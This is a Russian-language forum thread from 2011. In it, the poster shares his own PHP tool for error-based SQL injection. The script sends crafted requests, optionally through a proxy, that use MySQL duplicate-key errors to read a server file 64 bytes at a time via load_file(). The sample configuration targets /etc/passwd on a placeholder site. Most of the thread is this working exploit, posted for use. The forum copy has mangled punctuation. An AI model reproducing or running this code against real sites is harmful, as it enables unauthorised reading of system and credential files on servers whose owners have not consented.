Алгоритм реализации ERROR-BASED инъекции

Discussion in 'PHP' started by Cennarios, 6 Nov 2011.

  1. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Добрый! Необходима идея по конкретной реализации дампа файла посредством error-based в реализации на php.

    Может, кто видел рабочий скрипт под эту задачу.

    Заранее благодарен!
     
  2. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Алгоритм.

    Profit. Ограничение по переменной pos функции substring( max file size )
     
    #2 Cennarios, 15 Nov 2011
    Last edited: 15 Nov 2011
  3. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Поскольку осталось без ответа, выкладываю сам.

    PHP:
    function prep_packet$host$uri NULL$user_agent NULL$method='GET'){

                 
    $packet   settype$packet'array') && $packet NULL;
                 
    $packet   = array(   
                                  
    "$method /$uri HTTP/1.1\r\n",
                                   
    "Host: $host\r\n",
                                   
    "User-Agent: $user_agent\r\n",                        
           
    "Content-Type: application/x-www-form-urlencoded\r\n",
                                   
    "Connection: close\r\n\r\n" 
                                     
    ); 

     return 
    $packet;
     }

    function 
    tcp_send$host$port$packet) {

                 
    $answer  =  settype$answer,  'string') && $answer  NULL;
                 
    $packet_ =  settype$packet_'string') && $packet_ NULL;

                 
    $fp = @fsockopen$host$port$errnum$errstr2);

                 if ( 
    $fp ){

                 foreach( 
    $packet as $row ){
                          
    $packet_ .= $row;
                 }

                 
    fputs$fp$packet_);
                 while( !
    feof$fp) ){
                        
    $answer .= fread$fp1024);
                 }

             
    fclose($fp);
             }

    return 
    $answer;
    }


    function 
    transmission_by_proxy$proxyhost$proxyport$packet){
             
    $biteZ_  =  settype$biteZ_,  'string') && $biteZ_  NULL;
             
    $biteZ_  tcp_send$proxyhost$proxyport$packet);
    return 
    $biteZ_;
    }


    function 
    errbased$stack){


             
    $packet prep_packet$stack['host'], $stack['uri']);
             if( !
    is_array$packet)) die();

             
    $biteX  transmission_by_proxy$stack['proxyhost'], $stack['proxyport'], $packet);
             if( !
    is_string$biteX)) die();

    return 
    $biteX;
    }



    function 
    dump$stack$stopbite=NULL){

    if( !
    is_string$stack['filepath'])) die();

    $pref                 "$stopbite+or+1+group+by+concat((select+";
    $dstr                 =  settype$dstr,  'string') && $dstr  NULL;
    $stack['sqlInj']      = $pref."CHAR_LENGTH(load_file('".$stack['filepath']."'))),floor(rand(0)*2))+having+min(0)--+";
    $stack['uri']         = $stack['path'].$stack['sqlInj'];
    preg_match_all(       "/entry \'(.*)1\' for/Uis"errbased$stack), $biteS);
    $fsize                = (integer)$biteS[1][0];
    unset(                
    $stack['sqlInj']);
    unset(                
    $stack['uri']);


    $i=1;


     while( 
    $i<=$fsize){
            
    $i+=64;
            
    $stack['sqlInj']      = $pref."substring(load_file('".$stack['filepath']."'),".($i-64).",64)),floor(rand(0)*2))+having+min(0)--+";
            
    $stack['uri']         = $stack['path'].$stack['sqlInj'];
            
    preg_match_all(       "/entry \'(.*?)\' for/Uis"errbased$stack), $biteV);




            if( !isset( 
    $biteV[1][0])){
                return 
    $dstr;
            }
            
    $dstr                .= $biteV[1][0];
     }

    return 
    $dstr;
    }



    $stack['host']        = 'www.xxx.com';
    $stack['path']        = 'event.php?eventid=-123';
    $stack['proxyhost']   = 'www.xxx.com';
    $stack['proxyport']   = 80;
    $stack['filepath']    = '/etc/passwd';

    $passwd  dump$stack"'");

    echo 
    $passwd;
     
    2 people like this.